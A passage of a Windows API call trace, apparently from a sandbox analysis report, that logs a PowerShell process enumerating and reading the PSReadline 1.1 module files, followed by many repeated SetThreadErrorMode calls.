dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.869] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d7c0 | out: lpFindFileData=0x653ef8d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0224.869] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d7c0 | out: lpFindFileData=0x653ef8d7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0224.869] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8da20) returned 1 [0224.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d9e0) returned 1 [0224.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psd1")) returned 0xffffffff [0224.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.psm1")) returned 0xffffffff [0224.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.cdxml")) returned 0xffffffff [0224.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.xaml")) returned 0xffffffff [0224.869] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\en.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\en.dll")) returned 0xffffffff [0224.869] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x653ef8d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0224.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc30) returned 1 [0224.870] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dd10 | out: lpFileInformation=0x653ef8dd10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0224.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dbf0) returned 1 [0224.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc80) returned 1 [0224.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x653ef8d760, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0224.870] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0x653ef8d990 | out: lpFindFileData=0x653ef8d990*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.870] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.870] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0224.870] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0224.870] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0224.870] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0224.870] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d950 | out: lpFindFileData=0x653ef8d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0224.870] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dbb0) returned 1 [0224.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db70) returned 1 [0224.870] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psd1")) returned 0xffffffff [0224.871] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.psm1")) returned 0xffffffff [0224.871] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.cdxml")) returned 0xffffffff [0224.871] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.xaml")) returned 0xffffffff [0224.871] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\1.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\1.1.dll")) returned 0xffffffff [0224.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x653ef8d970, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0224.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.871] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline"), fInfoLevelId=0x0, lpFileInformation=0x653ef8dea0 | out: lpFileInformation=0x653ef8dea0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x653ef8d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0224.871] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0x653ef8db20 | out: lpFindFileData=0x653ef8db20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.871] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.872] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0224.872] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8dae0 | out: lpFindFileData=0x653ef8dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.872] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.872] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0224.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de30) returned 1 [0224.872] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df10 | out: lpFileInformation=0x653ef8df10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0224.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ddf0) returned 1 [0224.872] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0224.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dbd0) returned 1 [0224.872] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6f4 [0224.872] GetFileType (hFile=0x6f4) returned 0x1 [0224.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db40) returned 1 [0224.873] GetFileType (hFile=0x6f4) returned 0x1 [0224.873] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bed0b70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed0b70*, lpNumberOfBytesRead=0x653ef8dca8*=0x2e1, lpOverlapped=0x0) returned 1 [0224.874] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5bed0b70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5bed0b70*, lpNumberOfBytesRead=0x653ef8dca8*=0x0, lpOverlapped=0x0) returned 1 [0224.874] CloseHandle (hObject=0x6f4) returned 1 [0224.874] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0224.874] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psm1")) returned 0xffffffff [0224.874] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.cdxml")) returned 0xffffffff [0224.874] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.xaml")) returned 0xffffffff [0224.874] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.dll")) returned 0xffffffff [0224.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8df50) returned 1 [0224.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df10) returned 1 [0224.876] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfa0) returned 1 [0224.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ded0) returned 1 [0224.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de90) returned 1 [0224.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8df40) returned 1 [0224.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de70) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8df40) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de70) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddc0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd80) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de10) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd40) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dd00) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.885] SetThreadErrorMode (dwNewMode=0x1, 